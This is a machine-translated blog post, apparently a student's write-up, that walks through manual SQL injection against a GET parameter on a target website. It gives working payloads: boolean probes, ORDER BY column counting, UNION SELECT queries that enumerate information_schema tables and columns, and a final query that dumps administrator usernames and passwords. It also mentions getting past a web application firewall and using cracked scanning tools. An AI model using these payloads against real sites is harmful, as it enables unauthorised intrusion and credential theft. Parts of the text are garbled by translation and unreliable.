Shulou(Shulou.com)06/01 Report--

I am a novice, information security professional students have been learning about the theory of security learning, mainly for the construction of the website, but since contact with the web site before I found that the website is really full of loopholes, thus also fell in love with the study of the Internet, today and share my learning results, what is not good welcome to comment!

Today is mainly to talk about sql injection, sql injection principle and harm will not say more, we can baidu, to tell you about my practical experience.

SQL injection method (get parameter)

It's complicated, but it's useless. In fact, there are only two kinds: tool injection and manual injection.

(1) Choose whether the website can be sql injected (generally it is better to use Firefox browser-convenient)

(1) First check the URL page for xxx.com/xxx/id=23 pages or pseudo-static url can also be injected.·

(2) Enter after url

and 1=1 Return to page Normal

and 1=2 Return page error

or 1=1 Return page error

or 1=2 Return to normal page

Such websites have injection vulnerabilities.

Now the basic website has a website firewall (with anti-sql injection function), then available 'tool injection transfer generator' to regenerate a page (note to open this page to use iis or small cyclone), so you can bypass the website security dog.

Then operate on the newly generated page.

and 1=1 Return to page Normal

and 1=2 Return page error

or 1=1 Return page error

or 1=2 Return to normal page

This allows us to proceed to the next step.

(a) Personal experience should generally be scanned first. Why?

Because first should find the login interface of the website background, if even the login interface can not be found, even if you know the administrator's username and password what is the use of it.

You can manually find, that is, guess the name, usually admin| login| user and other asp, php, aspx, jsp suffix, this method is a bit silly, generally use tools for website traversal.

Scanning tools: tools are included in the attachment. I usually use the scanning tool of the sword first, but the sword is not young after all, and there is no follow-up update, so some website directories cannot be traversed, this is only a few awesome tools. Tool burpsuite (all said to be *** artifact, I have been using, very powerful, you can crawl the website and traverse the website directory) There is Acunitix Web Vulnerability Scanner This software is also very powerful, now out to 10, online cracking version. Please use Baidu for specific tutorials.

(ii) Injection

Available tools ah D, Ming Xiaozi, pangolin pangolin, sqlmap and other tools for injection, today mainly manual injection.

Manual injection:

1、order by 1..... 100 Number of judgment tables

If the page returns to normal, it means that this number is less than the number of tables, which is incremented in turn. It is best to take the middle test to save time. The last correct one is the number of tables. If 20 is normal, 21 is abnormal, the number of tables is 20.

2、 http://xxx.com/xxx.php? id=23 and 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20

Display 3, 7 numbers

Replace 3 or 7 with database(), version(), user(),@@version--compile_os

Report basic information (1) database(): database name-----abc

(2) version(): database version-------5.1.63-community

(3) user(): database user--------shsjk@localhost

(4)@@version--compile_os: operating system------win32

4. Query table name http://xxx/xxx.php? id=23 and 1=2 UNION SELECT 1,2,group_concat(table_name),4,5,6,7,8,9,10,11, 1,2,13,14,15,16,17,18,19,20from information_schema.tables where table_schema= 0x616263

The query results are: wz_jj_admin,wz_jj_article,wz_jj_p_w_upload,wz_jj_class,wz_jj_en_admin,wz_jj_en_article,wz_jj_en_p_w_upload,wz_jj_en_class,wz_jj_en_key,wz_jj_en_links,wz_jj_en_message,wz_jj_key,wz_jj_links,wz_jj_message

5. Column names of wz_jj_admin lookup table

http://xxx.com/xxx.php? id=23 and 1=2 UNION SELECT 1,2,group_concat(column_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from information_schema.columns where table_name=0x777A5F6A6A5F61646D696E

uid , ad_username,ad_password,ad_power,ad_intro

6. Find user name and password xxx.com/xxx.php? id=23 and 1=2 UNION SELECT 1,2,group_concat(ad_username,0x5c,ad_password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from wz_jj_admin

7, the result is: admin admin888 This is successful

This is just a simple sql injection. The following parameter injections include post injection and cookie injection. Please wait patiently!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.